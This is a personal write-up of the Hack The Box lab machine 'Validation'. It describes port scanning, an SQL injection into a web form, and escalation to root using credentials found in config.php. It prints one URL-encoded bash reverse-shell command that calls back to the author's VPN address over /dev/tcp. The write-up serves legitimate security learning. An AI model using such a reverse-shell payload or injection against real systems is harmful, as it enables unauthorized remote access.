This is my write-up for the machine called Validation located at: https://app.hackthebox.com/machines/Validation.

rustscan: rustscan -a 10.10.11.116

Going to port 80, we see this page:

On Hack The Box, I got a hint from one of the tags from the machine:

It seems that I need to run some type of SQL Injection on the page. After trying a bunch of SQL queries, I ended up running an nmap scan on the machine, since according to the walk-through, I had missed a bunch of open ports using rust scan:

After I got stuck, I found this write-up that basically made it understand where the vulnerability was:

I then got the following output:

This showed me that this is vulnerable to SQL Injection. Viewing the same write-up, I then changed the parameters to then submit to the website:

I then got stuck again and then watched this video that assisted a bit more in the understanding of what I was messing up on. I found out that I had to run the command to get a shell on the system:

After I ran this command, I was able to run commands on the system:

Apparently the IP Addresses of the VPN you are using on HTB can change, which was something I did not know. When I ran ifconfig, I understood why my reverse shell command was not working when I tried it. In any case, I got the reverse shell by running the following command (recommended by the official write-up and modified to work for me):

bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/1234+0>%261'

In order to get this to work though, you have to change your request from GET to POST, which can be done by clicking on the button below:

You can then submit the command, as seen in the image above. After I had the shell, the first thing I did was find the user.txt file:

I was trying to find a way to upload linpeas.sh or get a way to see what access I had, but I ended up getting nowhere. On the official write-up, the credentials I had seen earlier in config.php, were the credentials for the root user:

I was then able to get the flag using the root access.